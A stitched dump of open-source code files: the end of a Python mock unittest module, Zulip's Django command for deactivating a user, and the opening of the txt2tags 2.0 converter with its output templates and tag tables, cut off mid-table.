self.assertEqual(something, mock_something, "unpatched")
with patch('%s.something' % __name__) as mock_again:
self.assertEqual(something, mock_again, "unpatched")
self.assertEqual(something, mock_something,
"restored with wrong instance")
self.assertEqual(something, sentinel.Something, "not restored")
def test_with_statement_imbricated(self):
with patch('%s.something' % __name__) as mock_something:
self.assertEqual(something, mock_something, "unpatched")
with patch('%s.something_else' % __name__) as mock_something_else:
self.assertEqual(something_else, mock_something_else,
"unpatched")
self.assertEqual(something, sentinel.Something)
self.assertEqual(something_else, sentinel.SomethingElse)
def test_dict_context_manager(self):
foo = {}
with patch.dict(foo, {'a': 'b'}):
self.assertEqual(foo, {'a': 'b'})
self.assertEqual(foo, {})
with self.assertRaises(NameError):
with patch.dict(foo, {'a': 'b'}):
self.assertEqual(foo, {'a': 'b'})
raise NameError('Konrad')
self.assertEqual(foo, {})
class TestMockOpen(unittest.TestCase):
def test_mock_open(self):
mock = mock_open()
with patch('%s.open' % __name__, mock, create=True) as patched:
self.assertIs(patched, mock)
open('foo')
mock.assert_called_once_with('foo')
def test_mock_open_context_manager(self):
mock = mock_open()
handle = mock.return_value
with patch('%s.open' % __name__, mock, create=True):
with open('foo') as f:
f.read()
expected_calls = [call('foo'), call().__enter__(), call().read(),
call().__exit__(None, None, None)]
self.assertEqual(mock.mock_calls, expected_calls)
self.assertIs(f, handle)
def test_explicit_mock(self):
mock = MagicMock()
mock_open(mock)
with patch('%s.open' % __name__, mock, create=True) as patched:
self.assertIs(patched, mock)
open('foo')
mock.assert_called_once_with('foo')
def test_read_data(self):
mock = mock_open(read_data='foo')
with patch('%s.open' % __name__, mock, create=True):
h = open('bar')
result = h.read()
self.assertEqual(result, 'foo')
if __name__ == '__main__':
unittest.main()
|
udxxabp/zulip
|
refs/heads/master
|
zerver/management/commands/deactivate_user.py
|
116
|
from __future__ import absolute_import
from optparse import make_option
from django.core.management.base import BaseCommand
from zerver.lib.actions import do_deactivate_user, user_sessions
from zerver.models import get_user_profile_by_email, UserProfile
class Command(BaseCommand):
help = "Deactivate a user, including forcibly logging them out."
def add_arguments(self, parser):
parser.add_argument('-f', '--for-real',
dest='for_real',
action='store_true',
default=False,
help="Actually deactivate the user. Default is a dry run.")
parser.add_argument('email', metavar='<email>', type=str,
help='email of user to deactivate')
def handle(self, *args, **options):
user_profile = get_user_profile_by_email(options['email'])
print "Deactivating %s (%s) - %s" % (user_profile.full_name,
user_profile.email,
user_profile.realm.domain)
print "%s has the following active sessions:" % (user_profile.email,)
for session in user_sessions(user_profile):
print session.expire_date, session.get_decoded()
print ""
print "%s has %s active bots that will also be deactivated." % (
user_profile.email,
UserProfile.objects.filter(
is_bot=True, is_active=True, bot_owner=user_profile
).count()
)
if not options["for_real"]:
print "This was a dry run. Pass -f to actually deactivate."
exit(1)
do_deactivate_user(user_profile)
print "Sessions deleted, user deactivated."
|
farvardin/txt2tags-test
|
refs/heads/master
|
old/txt2tags-2.0.py
|
5
|
#!/usr/bin/env python
# txt2tags - generic text conversion tool
# http://txt2tags.sf.net
#
# Copyright 2001, 2002, 2003, 2004 Aurelio Marinho Jargas
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, version 2.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You have received a copy of the GNU General Public License along
# with this program, on the COPYING file.
#
##################################################################
# #
# - IMPORTANT - #
# #
# Due the major syntax changes, the new 2.x series BREAKS #
# backwards compatibility. #
# #
# Use the 't2tconv' script to upgrade your existing .t2t files #
# to conform the new v2.0 syntax. #
# #
# Do a visual inspection on the new converted file. #
# Specially Pre & Post proc filters can break. Check them! #
# #
##################################################################
########################################################################
#
# BORING CODE EXPLANATION AHEAD
#
# Just read if you wish to understand how the txt2tags code works
#
########################################################################
#
# Version 2.0 was a complete rewrite for the program 'core'.
#
# Now the code that [1] parses the marked text is separated from the
# code that [2] insert the target tags.
#
# [1] made by: def convert()
# [2] made by: class BlockMaster
#
# The structures of the marked text are identified and their contents are
# extracted into a data holder (Python lists and dictionaries).
#
# When parsing the source file, the blocks (para, lists, quote, table)
# are opened with BlockMaster right when they are found. Their contents,
# which span several lines, are fed into a special holder on the
# BlockMaster instance. Only when the block is closed are the target tags
# inserted, for the full block as a whole, in one pass. This gives much
# better control over blocks than the previous line-by-line approach.
#
# In other words, whenever inside a block, the parser *holds* the tag
# insertion process, waiting until the full block is read. That was
# needed primarily to close paragraphs for the new XHTML target, but
# proved to be a very good addition, improving many other processing steps.
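#
# A rough sketch of the flow described above (the names are illustrative,
# not the real signatures used further down in this file):
#
#   for line in marked_source:
#       kind = identify_block(line)          # para, list, quote, table, ...
#       if kind != current_kind:
#           output += block_master.close()   # tags emitted for the whole block
#           block_master.open(kind)
#       block_master.hold(line)              # contents held until the block closes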
#
# -------------------------------------------------------------------
#
# There is also a brand new code for the Configuration schema, 100%
# rewritten. There are new classes, all self documented: CommandLine,
# SourceDocument, ConfigMaster and ConfigLines. In short, a new RAW
# Config format was created, and all kind of configuration is first
# converted to this format, and then a generic method parses it.
#
# The init processing was also changed, and the functions which now
# get information about the input files are: get_infiles_config(),
# process_source_file() and convert_this_files()
#
# Other parts are untouched, and remains the same as in v1.7, as the
# marks regexes, target Headers and target Tags&Rules.
#
########################################################################
# Now I think the code is nice, easier to read and understand
#XXX Python coding warning
# Avoid common mistakes:
# - do NOT use newlist=list instead newlist=list[:]
# - do NOT use newdic=dic instead newdic=dic.copy()
# - do NOT use dic[key] instead dic.get(key)
# - do NOT use del dic[key] without has_key() before
#XXX Smart Image Align don't work if the image is a link
# Can't fix that because the image is expanded together with the
# link, at the linkbank filling moment. Only the image is passed
# to parse_images(), not the full line, so it is always 'middle'.
#XXX Paragraph separation not valid inside Quote
# Quote will not have <p></p> inside, instead will close and open
# again the <blockquote>. This really sux in CSS, when defining a
# diferent background color. Still don't know how to fix it.
#XXX TODO (maybe)
# New mark or macro which expands to and anchor full title.
# It is necessary to parse the full document in this order:
# DONE 1st scan: HEAD: get all settings, including %!includeconf
# DONE 2nd scan: BODY: expand includes & apply %!preproc
# 3rd scan: BODY: read titles and compose TOC info
# 4th scan: BODY: full parsing, expanding [#anchor] 1st
# Steps 2 and 3 can be made together, with no tag adding.
# Two complete body scans will be *slow*, don't know if it worths.
##############################################################################
# User config (1=ON, 0=OFF)
USE_I18N = 1 # use gettext for i18ned messages? (default is 1)
COLOR_DEBUG = 1 # show debug messages in colors? (default is 1)
HTML_LOWER = 0 # use lowercased HTML tags instead upper? (default is 0)
##############################################################################
# these are all the core Python modules used by txt2tags (KISS!)
import re, string, os, sys, getopt
from time import strftime,time,localtime
# program information
my_url = 'http://txt2tags.sf.net'
my_name = 'txt2tags'
my_email = 'verde@aurelio.net'
my_version = '2.0' #-betaN
# i18n - just use if available
if USE_I18N:
try:
import gettext
# if your locale dir is different, change it here
cat = gettext.Catalog('txt2tags',localedir='/usr/share/locale/')
_ = cat.gettext
except:
_ = lambda x:x
else:
_ = lambda x:x
# FLAGS   : the conversion related flags  , may be used in %!options
# OPTIONS : the conversion related options, may be used in %!options
# ACTIONS : the other behaviour modifiers, valid on command line only
# SETTINGS: global miscellaneous settings, valid on RC file only
# CONFIG_KEYWORDS: the valid %!key:val keywords
#
# FLAGS and OPTIONS are configs that affect the converted document.
# They usually have also a --no-<option> to turn them OFF.
# ACTIONS are needed because, when doing multiple input files, strange
# behaviour could result, such as using the command line interface for the
# first file and the GUI for the second. There is no --no-<action>.
# --version and --help inside %!options are also odd
#
TARGETS = ['html', 'xhtml', 'sgml', 'tex', 'man', 'mgp', 'moin', 'pm6', 'txt']
FLAGS = {'headers' :1 , 'enum-title' :0 , 'mask-email' :0 ,
'toc-only' :0 , 'toc' :0 , 'rc' :1 ,
'css-suggar' :0 }
OPTIONS = {'target' :'', 'toc-level' :3 , 'style' :'',
'infile' :'', 'outfile' :'', 'encoding' :'',
'split' :0 , 'lang' :''}
ACTIONS = {'help' :0 , 'version' :0 , 'gui' :0 ,
'verbose' :0 , 'debug' :0 , 'dump-config':0 }
SETTINGS = {} # for future use
CONFIG_KEYWORDS = [
'target', 'encoding', 'style', 'options', 'preproc','postproc',
'guicolors']
TARGET_NAMES = {
'html' : _('HTML page'),
'xhtml': _('XHTML page'),
'sgml' : _('SGML document'),
'tex' : _('LaTeX document'),
'man' : _('UNIX Manual page'),
'mgp' : _('Magic Point presentation'),
'moin' : _('MoinMoin page'),
'pm6' : _('PageMaker 6.0 document'),
'txt' : _('Plain Text'),
}
DEBUG = 0 # do not edit here, please use --debug
VERBOSE = 0 # do not edit here, please use -v, -vv or -vvv
GUI = 0
RC_RAW = []
CMDLINE_RAW = []
CONF = {}
BLOCK = None
regex = {}
TAGS = {}
rules = {}
currdate = strftime('%Y%m%d',localtime(time())) # ISO current date
lang = 'english'
TARGET = ''
STDIN = STDOUT = '-'
ESCCHAR = '\x00'
SEPARATOR = '\x01'
LISTNAMES = {'-':'list', '+':'numlist', ':':'deflist'}
LINEBREAK = {'default':'\n', 'win':'\r\n', 'mac':'\r'}
RCFILE = {'default':'.txt2tagsrc', 'win':'_t2trc'}
#my_version = my_version + '-dev' + currdate[4:] # devel!
# platform specific settings
LB = LINEBREAK.get(sys.platform[:3]) or LINEBREAK['default']
RC = RCFILE.get(sys.platform[:3]) or RCFILE['default']
VERSIONSTR = _("%s version %s <%s>")%(my_name,my_version,my_url)
USAGE = string.join([
'',
_("Usage: %s [OPTIONS] [infile.t2t ...]") % my_name,
'',
_(" -t, --target set target document type. currently supported:"),
' %s' % re.sub(r"[]'[]",'',repr(TARGETS)),
_(" -i, --infile=FILE set FILE as the input file name ('-' for STDIN)"),
_(" -o, --outfile=FILE set FILE as the output file name ('-' for STDOUT)"),
_(" -n, --enum-title enumerate all title lines as 1, 1.1, 1.1.1, etc"),
_(" -H, --no-headers suppress header, title and footer contents"),
_(" --headers show header, title and footer contents (default ON)"),
_(" --encoding set target file encoding (utf-8, iso-8859-1, etc)"),
_(" --style=FILE use FILE as the document style (like HTML CSS)"),
_(" --css-suggar insert CSS-friendly tags for HTML and XHTML targets"),
_(" --mask-email hide email from spam robots. x@y.z turns <x (a) y z>"),
_(" --toc add TOC (Table of Contents) to target document"),
_(" --toc-only print document TOC and exit"),
_(" --toc-level=N set maximum TOC level (depth) to N"),
_(" --rc read user config file ~/.txt2tagsrc (default ON)"),
_(" --gui invoke Graphical Tk Interface"),
_(" -v, --verbose print informative messages during convertion"),
_(" -h, --help print this help information and exit"),
_(" -V, --version print program version and exit"),
_(" --dump-config print all the config found and exit"),
'',
_("Turn OFF options:"),
" --no-outfile, --no-infile, --no-style, --no-encoding, --no-headers",
" --no-toc, --no-toc-only, --no-mask-email, --no-enum-title, --no-rc",
" --no-css-suggar",
'',
_("Example:\n %s -t html --toc myfile.t2t") % my_name,
'',
_("By default, converted output is saved to 'infile.<target>'."),
_("Use --outfile to force an output file name."),
_("If input file is '-', reads from STDIN."),
_("If output file is '-', dumps output to STDOUT."),
''
], '\n')
##############################################################################
# here is all the target's templates
# you may edit them to fit your needs
# - the %(HEADERn)s strings represent the Header lines
# - the %(STYLE)s string is changed by --style contents
# - the %(ENCODING)s string is changed by --encoding contents
# - if any of the above is empty, the full line is removed
# - use %% to represent a literal %
#
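# For example (illustrative; the program fills these placeholders itself):
#   HEADER_TEMPLATE['txt'] % {'HEADER1': 'My Title', 'HEADER2': 'Author', 'HEADER3': '2004-07-01'}
# returns the three header lines of the plain text target, one per line.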
HEADER_TEMPLATE = {
'txt': """\
%(HEADER1)s
%(HEADER2)s
%(HEADER3)s
""",
'sgml': """\
<!doctype linuxdoc system>
<article>
<title>%(HEADER1)s
<author>%(HEADER2)s
<date>%(HEADER3)s
""",
'html': """\
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<HTML>
<HEAD>
<META NAME="generator" CONTENT="http://txt2tags.sf.net">
<META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=%(ENCODING)s">
<LINK REL="stylesheet" TYPE="text/css" HREF="%(STYLE)s">
<TITLE>%(HEADER1)s</TITLE>
</HEAD><BODY BGCOLOR="white" TEXT="black">
<P ALIGN="center"><CENTER><H1>%(HEADER1)s</H1>
<FONT SIZE="4">
<I>%(HEADER2)s</I><BR>
%(HEADER3)s
</FONT></CENTER>
""",
'htmlcss': """\
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<HTML>
<HEAD>
<META NAME="generator" CONTENT="http://txt2tags.sf.net">
<META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=%(ENCODING)s">
<LINK REL="stylesheet" TYPE="text/css" HREF="%(STYLE)s">
<TITLE>%(HEADER1)s</TITLE>
</HEAD>
<BODY>
<DIV CLASS="header" ID="header">
<H1>%(HEADER1)s</H1>
<H2>%(HEADER2)s</H2>
<H3>%(HEADER3)s</H3>
</DIV>
""",
'xhtml': """\
<?xml version="1.0"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"\
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>%(HEADER1)s</title>
<meta name="generator" content="http://txt2tags.sf.net" />
<meta http-equiv="Content-Type" content="text/html; charset=%(ENCODING)s" />
<link rel="stylesheet" type="text/css" href="%(STYLE)s" />
</head>
<body bgcolor="white" text="black">
<div align="center">
<h1>%(HEADER1)s</h1>
<h2>%(HEADER2)s</h2>
<h3>%(HEADER3)s</h3>
</div>
""",
'xhtmlcss': """\
<?xml version="1.0"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"\
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>%(HEADER1)s</title>
<meta name="generator" content="http://txt2tags.sf.net" />
<meta http-equiv="Content-Type" content="text/html; charset=%(ENCODING)s" />
<link rel="stylesheet" type="text/css" href="%(STYLE)s" />
</head>
<body>
<div class="header" id="header">
<h1>%(HEADER1)s</h1>
<h2>%(HEADER2)s</h2>
<h3>%(HEADER3)s</h3>
</div>
""",
'man': """\
.TH "%(HEADER1)s" 1 "%(HEADER3)s" "%(HEADER2)s"
""",
# TODO style to <HR>
'pm6': """\
<PMTags1.0 win><C-COLORTABLE ("Preto" 1 0 0 0)
><@Normal=
<FONT "Times New Roman"><CCOLOR "Preto"><SIZE 11>
<HORIZONTAL 100><LETTERSPACE 0><CTRACK 127><CSSIZE 70><C+SIZE 58.3>
<C-POSITION 33.3><C+POSITION 33.3><P><CBASELINE 0><CNOBREAK 0><CLEADING -0.05>
<GGRID 0><GLEFT 7.2><GRIGHT 0><GFIRST 0><G+BEFORE 7.2><G+AFTER 0>
<GALIGNMENT "justify"><GMETHOD "proportional"><G& "ENGLISH">
<GPAIRS 12><G%% 120><GKNEXT 0><GKWIDOW 0><GKORPHAN 0><GTABS $>
<GHYPHENATION 2 34 0><GWORDSPACE 75 100 150><GSPACE -5 0 25>
><@Bullet=<@-PARENT "Normal"><FONT "Abadi MT Condensed Light">
<GLEFT 14.4><G+BEFORE 2.15><G%% 110><GTABS(25.2 l "")>
><@PreFormat=<@-PARENT "Normal"><FONT "Lucida Console"><SIZE 8><CTRACK 0>
<GLEFT 0><G+BEFORE 0><GALIGNMENT "left"><GWORDSPACE 100 100 100><GSPACE 0 0 0>
><@Title1=<@-PARENT "Normal"><FONT "Arial"><SIZE 14><B>
<GCONTENTS><GLEFT 0><G+BEFORE 0><GALIGNMENT "left">
><@Title2=<@-PARENT "Title1"><SIZE 12><G+BEFORE 3.6>
><@Title3=<@-PARENT "Title1"><SIZE 10><GLEFT 7.2><G+BEFORE 7.2>
><@Title4=<@-PARENT "Title3">
><@Title5=<@-PARENT "Title3">
><@Quote=<@-PARENT "Normal"><SIZE 10><I>>
%(HEADER1)s
%(HEADER2)s
%(HEADER3)s
""",
'mgp': """\
#!/usr/X11R6/bin/mgp -t 90
%%deffont "normal" xfont "utopia-medium-r", charset "iso8859-1"
%%deffont "normal-i" xfont "utopia-medium-i", charset "iso8859-1"
%%deffont "normal-b" xfont "utopia-bold-r" , charset "iso8859-1"
%%deffont "normal-bi" xfont "utopia-bold-i" , charset "iso8859-1"
%%deffont "mono" xfont "courier-medium-r", charset "iso8859-1"
%%default 1 size 5
%%default 2 size 8, fore "yellow", font "normal-b", center
%%default 3 size 5, fore "white", font "normal", left, prefix " "
%%tab 1 size 4, vgap 30, prefix " ", icon arc "red" 40, leftfill
%%tab 2 prefix " ", icon arc "orange" 40, leftfill
%%tab 3 prefix " ", icon arc "brown" 40, leftfill
%%tab 4 prefix " ", icon arc "darkmagenta" 40, leftfill
%%tab 5 prefix " ", icon arc "magenta" 40, leftfill
%%%%------------------------- end of headers -----------------------------
%%page
%%size 10, center, fore "yellow"
%(HEADER1)s
%%font "normal-i", size 6, fore "white", center
%(HEADER2)s
%%font "mono", size 7, center
%(HEADER3)s
""",
# TODO please, improve me!
'moin': """\
'''%(HEADER1)s'''
''%(HEADER2)s''
%(HEADER3)s
""",
'tex': \
r"""\documentclass[11pt,a4paper]{article}
\usepackage{amsfonts,graphicx,url}
\usepackage[%(ENCODING)s]{inputenc} %% char encoding
\usepackage{%(STYLE)s} %% user defined package
\pagestyle{plain} %% do page numbering ('empty' turns off)
\frenchspacing                %% no additional spaces after periods
\setlength{\parskip}{8pt}\parindent=0pt %% no paragraph indentation
%% uncomment next line for fancy PDF output on Adobe Acrobat Reader
%%\usepackage[pdfstartview=FitV,colorlinks=true,bookmarks=true]{hyperref}
\title{%(HEADER1)s}
\author{%(HEADER2)s}
\begin{document}
\date{%(HEADER3)s}
\maketitle
\clearpage
"""
}
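# A minimal usage sketch (illustrative only, not part of the program flow):
# each template above is a plain %-format string, so filling it is just a
# dictionary expansion. The sample values below are made up for this example;
# the real program also removes lines whose %(...)s value came out empty.
#
#   header = HEADER_TEMPLATE['man'] % {
#       'HEADER1': 'My Doc', 'HEADER2': 'The Author', 'HEADER3': 'Today',
#       'STYLE': '', 'ENCODING': ''}
#   # -> '.TH "My Doc" 1 "Today" "The Author"\n'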
##############################################################################
def getTags(target):
"Returns all the known tags for the specified target"
keys = [
'paragraphOpen','paragraphClose',
'title1','title2','title3','title4','title5',
'numtitle1','numtitle2','numtitle3','numtitle4','numtitle5',
'blockVerbOpen','blockVerbClose',
'blockQuoteOpen','blockQuoteClose','blockQuoteLine',
'fontMonoOpen','fontMonoClose',
'fontBoldOpen','fontBoldClose',
'fontItalicOpen','fontItalicClose',
'fontUnderlineOpen','fontUnderlineClose',
'listOpen','listClose',
'listItemOpen','listItemClose','listItemLine',
'numlistOpen','numlistClose',
'numlistItemOpen','numlistItemClose','numlistItemLine',
'deflistOpen','deflistClose',
'deflistItem1Open','deflistItem1Close',
'deflistItem2Open','deflistItem2Close',
'bar1','bar2',
'url','urlMark','email','emailMark',
'img',
'tableOpen','tableClose',
'tableRowOpen','tableRowClose','tableRowSep',
'tableCellOpen','tableCellClose','tableCellSep',
'tableTitleCellOpen','tableTitleCellClose','tableTitleCellSep',
'tableTitleRowOpen','tableTitleRowClose',
'tableBorder', 'tableAlignLeft', 'tableAlignCenter',
'tableCellAlignLeft','tableCellAlignRight','tableCellAlignCenter',
'tableColAlignLeft','tableColAlignRight','tableColAlignCenter',
'tableColAlignSep',
'anchor','comment',
'TOC','tocOpen','tocClose','tocOpenCss','tocCloseCss',
'bodyOpenCss','bodyCloseCss',
'EOD'
]
alltags = {
'txt': {
'title1' : ' \a' ,
'title2' : '\t\a' ,
'title3' : '\t\t\a' ,
'title4' : '\t\t\t\a' ,
'title5' : '\t\t\t\t\a',
'blockQuoteLine' : '\t' ,
'listItemOpen' : '- ' ,
'numlistItemOpen' : '\a. ' ,
'bar1' : '\a' ,
'bar2' : '\a' ,
'url' : '\a' ,
'urlMark' : '\a (\a)' ,
'email' : '\a' ,
'emailMark' : '\a (\a)' ,
'img' : '[\a]' ,
},
'html': {
'paragraphOpen' : '<P>' ,
'paragraphClose' : '</P>' ,
'title1' : '~A~<H1>\a</H1>' ,
'title2' : '~A~<H2>\a</H2>' ,
'title3' : '~A~<H3>\a</H3>' ,
'title4' : '~A~<H4>\a</H4>' ,
'title5' : '~A~<H5>\a</H5>' ,
'blockVerbOpen' : '<PRE>' ,
'blockVerbClose' : '</PRE>' ,
'blockQuoteOpen' : '<BLOCKQUOTE>' ,
'blockQuoteClose' : '</BLOCKQUOTE>' ,
'fontMonoOpen' : '<CODE>' ,
'fontMonoClose' : '</CODE>' ,
'fontBoldOpen' : '<B>' ,
'fontBoldClose' : '</B>' ,
'fontItalicOpen' : '<I>' ,
'fontItalicClose' : '</I>' ,
'fontUnderlineOpen' : '<U>' ,
'fontUnderlineClose' : '</U>' ,
'listOpen' : '<UL>' ,
'listClose' : '</UL>' ,
'listItemOpen' : '<LI>' ,
'numlistOpen' : '<OL>' ,
'numlistClose' : '</OL>' ,
'numlistItemOpen' : '<LI>' ,
'deflistOpen' : '<DL>' ,
'deflistClose' : '</DL>' ,
'deflistItem1Open' : '<DT>' ,
'deflistItem1Close' : '</DT>' ,
'deflistItem2Open' : '<DD>' ,
'bar1' : '<HR NOSHADE SIZE=1>' ,
'bar2' : '<HR NOSHADE SIZE=5>' ,
'url' : '<A HREF="\a">\a</A>' ,
'urlMark' : '<A HREF="\a">\a</A>' ,
'email' : '<A HREF="mailto:\a">\a</A>' ,
'emailMark' : '<A HREF="mailto:\a">\a</A>' ,
'img' :'<IMG ALIGN="~A~" SRC="\a" BORDER="0" ALT="">',
'tableOpen' : '<TABLE~A~ CELLPADDING="4"~B~>',
'tableClose' : '</TABLE>' ,
'tableRowOpen' : '<TR>' ,
'tableRowClose' : '</TR>' ,
'tableCellOpen' : '<TD\a>' ,
'tableCellClose' : '</TD>' ,
'tableTitleCellOpen' : '<TH>' ,
'tableTitleCellClose' : '</TH>' ,
'tableBorder' : ' BORDER="1"' ,
'tableAlignCenter' : ' ALIGN="center"',
'tableCellAlignRight' : ' ALIGN="right"' ,
'tableCellAlignCenter': ' ALIGN="center"',
'anchor' : '<A NAME="\a"></A>\n',
'tocOpenCss' : '<DIV CLASS="toc" ID="toc">',
'tocCloseCss' : '</DIV>',
'bodyOpenCss' : '<DIV CLASS="body" ID="body">',
'bodyCloseCss' : '</DIV>',
'comment' : '<!-- \a -->' ,
'EOD' : '</BODY></HTML>'
},
#TIP xhtml inherits all HTML definitions (lowercased)
#TIP http://www.w3.org/TR/xhtml1/#guidelines
#TIP http://www.htmlref.com/samples/Chapt17/17_08.htm
'xhtml': {
'listItemClose' : '</li>' ,
'numlistItemClose' : '</li>' ,
'deflistItem2Close' : '</dd>' ,
'bar1' : '<hr class="light" />',
'bar2' : '<hr class="heavy" />',
'anchor' : '<a id="\a" name="\a"></a>\n',
'img' :'<img align="~A~" src="\a" border="0" alt=""/>',
},
'sgml': {
'paragraphOpen' : '<p>' ,
'title1' : '<sect>\a~A~<p>' ,
'title2' : '<sect1>\a~A~<p>' ,
'title3' : '<sect2>\a~A~<p>' ,
'title4' : '<sect3>\a~A~<p>' ,
'title5' : '<sect4>\a~A~<p>' ,
'blockVerbOpen' : '<tscreen><verb>' ,
'blockVerbClose' : '</verb></tscreen>' ,
'blockQuoteOpen' : '<quote>' ,
'blockQuoteClose' : '</quote>' ,
'fontMonoOpen' : '<tt>' ,
'fontMonoClose' : '</tt>' ,
'fontBoldOpen' : '<bf>' ,
'fontBoldClose' : '</bf>' ,
'fontItalicOpen' : '<em>' ,
'fontItalicClose' : '</em>' ,
'fontUnderlineOpen' : '<bf><em>' ,
'fontUnderlineClose' : '</em></bf>' ,
'listOpen' : '<itemize>' ,
'listClose' : '</itemize>' ,
'listItemOpen' : '<item>' ,
'numlistOpen' : '<enum>' ,
'numlistClose' : '</enum>' ,
'numlistItemOpen' : '<item>' ,
'deflistOpen' : '<descrip>' ,
'deflistClose' : '</descrip>' ,
'deflistItem1Open' : '<tag>' ,
'deflistItem1Close' : '</tag>' ,
'bar1' : '<!-- \a -->' ,
'bar2' : '<!-- \a -->' ,
'url' : '<htmlurl url="\a" name="\a">' ,
'urlMark' : '<htmlurl url="\a" name="\a">' ,
'email' : '<htmlurl url="mailto:\a" name="\a">' ,
'emailMark' : '<htmlurl url="mailto:\a" name="\a">' ,
'img' : '<figure><ph vspace=""><img src="\a">'+\
'</figure>' ,
'tableOpen' : '<table><tabular ca="~C~">' ,
'tableClose' : '</tabular></table>' ,
'tableRowSep' : '<rowsep>' ,
'tableCellSep' : '<colsep>' ,
'tableColAlignLeft' : 'l' ,
'tableColAlignRight' : 'r' ,
'tableColAlignCenter' : 'c' ,
'comment' : '<!-- \a -->' ,
'anchor' : '<label id="\a">' ,
'TOC' : '<toc>' ,
'EOD' : '</article>'
},
'tex': {
	'title1'              : '\n\\section*{\a}',
'title2' : '\\subsection*{\a}' ,
'title3' : '\\subsubsection*{\a}' ,
# title 4/5: DIRTY: para+BF+\\+\n
'title4' : '\\paragraph{}\\textbf{\a}\\\\\n',
'title5' : '\\paragraph{}\\textbf{\a}\\\\\n',
	'numtitle1'           : '\n\\section{\a}',
'numtitle2' : '\\subsection{\a}' ,
'numtitle3' : '\\subsubsection{\a}' ,
'blockVerbOpen' : '\\begin{verbatim}' ,
'blockVerbClose' : '\\end{verbatim}' ,
'blockQuoteOpen' : '\\begin{quotation}' ,
'blockQuoteClose' : '\\end{quotation}' ,
'fontMonoOpen' : '\\texttt{' ,
'fontMonoClose' : '}' ,
'fontBoldOpen' : '\\textbf{' ,
'fontBoldClose' : '}' ,
'fontItalicOpen' : '\\textit{' ,
'fontItalicClose' : '}' ,
'fontUnderlineOpen' : '\\underline{' ,
'fontUnderlineClose' : '}' ,
'listOpen' : '\\begin{itemize}' ,
'listClose' : '\\end{itemize}' ,
'listItemOpen' : '\\item ' ,
'numlistOpen' : '\\begin{enumerate}' ,
'numlistClose' : '\\end{enumerate}' ,
'numlistItemOpen' : '\\item ' ,
'deflistOpen' : '\\begin{description}',
'deflistClose' : '\\end{description}' ,
'deflistItem1Open' : '\\item[' ,
'deflistItem1Close' : ']' ,
'bar1' : '\n\\hrulefill{}\n' ,
'bar2' : '\n\\rule{\linewidth}{1mm}\n',
'url' : '\\url{\a}' ,
'urlMark' : '\\textit{\a} (\\url{\a})' ,
'email' : '\\url{\a}' ,
'emailMark' : '\\textit{\a} (\\url{\a})' ,
'img' : '\\includegraphics{\a}',
'tableOpen' : '\\begin{center}\\begin{tabular}{|~C~|}',
'tableClose' : '\\end{tabular}\\end{center}',
'tableRowOpen' : '\\hline ' ,
'tableRowClose' : ' \\\\' ,
'tableCellSep' : ' & ' ,
'tableColAlignLeft' : 'l' ,
'tableColAlignRight' : 'r' ,
'tableColAlignCenter' : 'c' ,
'tableColAlignSep' : '|' ,
'comment' : '% \a' ,
'TOC' : '\\tableofcontents\\clearpage',
'EOD' : '\\end{document}'
},
'moin': {
'title1' : '= \a =' ,
'title2' : '== \a ==' ,
'title3' : '=== \a ===' ,
'title4' : '==== \a ====' ,
'title5' : '===== \a =====',
'blockVerbOpen' : '{{{' ,
'blockVerbClose' : '}}}' ,
'blockQuoteLine' : ' ' ,
'fontMonoOpen' : '{{{' ,
'fontMonoClose' : '}}}' ,
'fontBoldOpen' : "'''" ,
'fontBoldClose' : "'''" ,
'fontItalicOpen' : "''" ,
'fontItalicClose' : "''" ,
'fontUnderlineOpen' : "__" ,
'fontUnderlineClose' : "__" ,
'listItemOpen' : ' * ' ,
'numlistItemOpen' : ' \a. ' ,
'bar1' : '----' ,
'bar2' : '----' ,
'url' : '[\a]' ,
'urlMark' : '[\a \a]' ,
'email' : '[\a]' ,
'emailMark' : '[\a \a]' ,
'img' : '[\a]' ,
'tableRowOpen' : '||' ,
'tableCellOpen' : '\a' ,
'tableCellClose' : '||' ,
'tableTitleCellClose' : '||' ,
'tableCellAlignRight' : '<)>' ,
'tableCellAlignCenter': '<:>' ,
'comment' : '## \a' ,
'TOC' : '[[TableOfContents]]'
},
'mgp': {
'paragraphOpen' : '%font "normal", size 5' ,
'title1' : '%page\n\n\a\n' ,
'title2' : '%page\n\n\a\n' ,
'title3' : '%page\n\n\a\n' ,
'title4' : '%page\n\n\a\n' ,
'title5' : '%page\n\n\a\n' ,
'blockVerbOpen' : '%font "mono"' ,
'blockVerbClose' : '%font "normal"' ,
'blockQuoteOpen' : '%prefix " "' ,
'blockQuoteClose' : '%prefix " "' ,
'fontMonoOpen' : '\n%cont, font "mono"\n' ,
'fontMonoClose' : '\n%cont, font "normal"\n' ,
'fontBoldOpen' : '\n%cont, font "normal-b"\n' ,
'fontBoldClose' : '\n%cont, font "normal"\n' ,
'fontItalicOpen' : '\n%cont, font "normal-i"\n' ,
'fontItalicClose' : '\n%cont, font "normal"\n' ,
'fontUnderlineOpen' : '\n%cont, fore "cyan"\n' ,
'fontUnderlineClose' : '\n%cont, fore "white"\n' ,
'listItemLine' : '\t' ,
'numlistItemLine' : '\t' ,
'deflistItem1Open' : '\t\n%cont, font "normal-b"\n',
'deflistItem1Close' : '\n%cont, font "normal"\n' ,
'bar1' : '%bar "white" 5' ,
'bar2' : '%pause' ,
'url' : '\n%cont, fore "cyan"\n\a' +\
'\n%cont, fore "white"\n' ,
'urlMark' : '\a \n%cont, fore "cyan"\n\a'+\
'\n%cont, fore "white"\n' ,
'email' : '\n%cont, fore "cyan"\n\a' +\
'\n%cont, fore "white"\n' ,
'emailMark' : '\a \n%cont, fore "cyan"\n\a'+\
